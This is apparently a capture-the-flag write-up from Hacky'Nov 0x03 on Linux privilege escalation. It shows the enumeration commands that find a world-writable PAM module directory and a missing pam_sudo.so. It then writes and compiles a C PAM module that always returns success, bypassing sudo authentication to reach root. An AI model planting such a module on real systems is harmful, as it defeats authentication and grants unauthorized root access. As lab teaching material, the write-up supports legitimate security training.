/Cybersecurity/ /Hacky'Nov 0x03/ /PrivEsc/

HN0x03 | Escalade comme un Yamakasi - Pampampilap

• HN0x03 | Escalade comme un Yamakasi - Pampampilap
  • Goal
  • Walkthrough

HN0x03 | Escalade comme un Yamakasi - Pampampilap

This challenge is a part of the Hacky’Nov 0x03 CTF.

Goal

Find a way to become root.

Walkthrough

Here we’re back to basics: a basic user in a machine without much information. Let’s start by checking the sudo permissions:

lolo@6c3ee15faa89:~$ sudo -l
User lolo may run the following commands on 6c3ee15faa89:
    (lekik) NOPASSWD: ALL
lolo@6c3ee15faa89:~$ sudo -u lekik sudo -l
[sudo] password for lekik:
Sorry, try again.

Well, we’re allowed to run commands as the user lekik without a password but without knowing its password, we won’t be able to elevate our privileges anymore (we can’t even know if lekik has any sudo permissions).

Let’s try to find suid binaries:

lolo@6c3ee15faa89:~$ find / -type f -perm /u=s 2>/dev/null
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/chfn
/usr/bin/mount
/usr/bin/umount
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign

Nothing unusual here… It looks like there is no “obvious” way to escalate our privileges for now.

Maybe we can check for funny files and permissions?

I’m not really used to using linpeas and I often struggle to find the useful information in the output. But many people love it, so let’s try it:

lolo@6c3ee15faa89:~$ ./linpeas.sh
[...]
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 500)
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-files
/dev/mqueue
/dev/shm
/home/lolo
/run/lock
/tmp
/usr/lib/x86_64-linux-gnu/security
/var/tmp
[...]

We can see that /usr/lib/x86_64-linux-gnu/security is writable, note that if you don’t like linpeas or don’t have it, you can also use the good old find command:

lolo@6c3ee15faa89:~$ find /usr /bin -writable -not -type l
/usr/lib/x86_64-linux-gnu/security

This will find everything writable in /usr and /bin (except for symlinks).

Let’s check what’s inside this security directory, since it looks a bit weird to have something in /usr that is writable by a user:

lolo@6c3ee15faa89:~$ ls -la /usr/lib/x86_64-linux-gnu/security/
total 1348
drwxrwxrwx 1 root root   4096 May 13 18:54 .
drwxr-xr-x 1 root root   4096 May 13 19:05 ..
-rw-r--r-- 1 root root  18432 Sep 21  2023 pam_access.so
-rw-r--r-- 1 root root  14416 Sep 21  2023 pam_debug.so
-rw-r--r-- 1 root root  14040 Sep 21  2023 pam_deny.so
[...]
-rw-r--r-- 1 root root  55376 Sep 21  2023 pam_unix.so
-rw-r--r-- 1 root root  14336 Sep 21  2023 pam_userdb.so
-rw-r--r-- 1 root root  14336 Sep 21  2023 pam_usertype.so
-rw-r--r-- 1 root root  14336 Sep 21  2023 pam_warn.so
-rw-r--r-- 1 root root  14336 Sep 21  2023 pam_wheel.so
-rw-r--r-- 1 root root  22528 Sep 21  2023 pam_xauth.so

We can see that there are some pam modules in there. PAM is the Pluggable Authentication Modules system, which is used by many services to delegate the authentication and co. to an external, common system. Many (if not all?) mainstream Linux flavors heavily rely on PAM and binaries like sudo or su use it by default.

Since we’re allowed to write new PAM modules in this directory, we can try to create a new one! However, for this trick to work, we need it to be configured in /etc/pam.d/* files. These are usually owned by root and not writable by us…

# Use comm to print only modules that are used in files in /etc/pam.d/ but that do not exist in /usr/lib/x86_64-linux-gnu/security
# Yes I totally flex this command :)

lolo@6c3ee15faa89:~$ comm -23 <(grep --no-filename -o -r "pam_.*\.so" /etc/pam.d/ | sort -u) <(ls -1 /usr/lib/x86_64-linux-gnu/security)
pam_sudo.so
lolo@6c3ee15faa89:~$ grep -r pam_sudo.so /etc/pam.d/
/etc/pam.d/sudo:auth       sufficient   pam_sudo.so

We can see that there is a pam_sudo.so module that is used in the /etc/pam.d/sudo file. Since the pam_sudo.so module is set to sufficient, it means that if it succeeds, the authentication will be successful. We can try to create a new pam_sudo.so module that will always succeed and try again to use sudo with user lekik:

#define __unused __attribute__((unused))

#include <security/pam_modules.h>

PAM_EXTERN int pam_sm_authenticate(__unused pam_handle_t *handle, __unused int flags, __unused int argc, __unused const char **argv)
{
  return PAM_SUCCESS;
}

Compile it like that:

gcc -W -Wall -Wextra -Werror -pedantic -shared -o /usr/lib/x86_64-linux-gnu/security/pam_sudo.so pam_sudo.c

We can now try to use sudo as lekik:

lolo@6c3ee15faa89:~$ sudo -u lekik sudo -l
User lekik may run the following commands on 6c3ee15faa89:
    (ALL) ALL

Perfect, we can now run any command as root!

lolo@6c3ee15faa89:~$ sudo -u lekik sudo su -
root@6c3ee15faa89:~# cat flag.txt
HNx03{FunnyPam}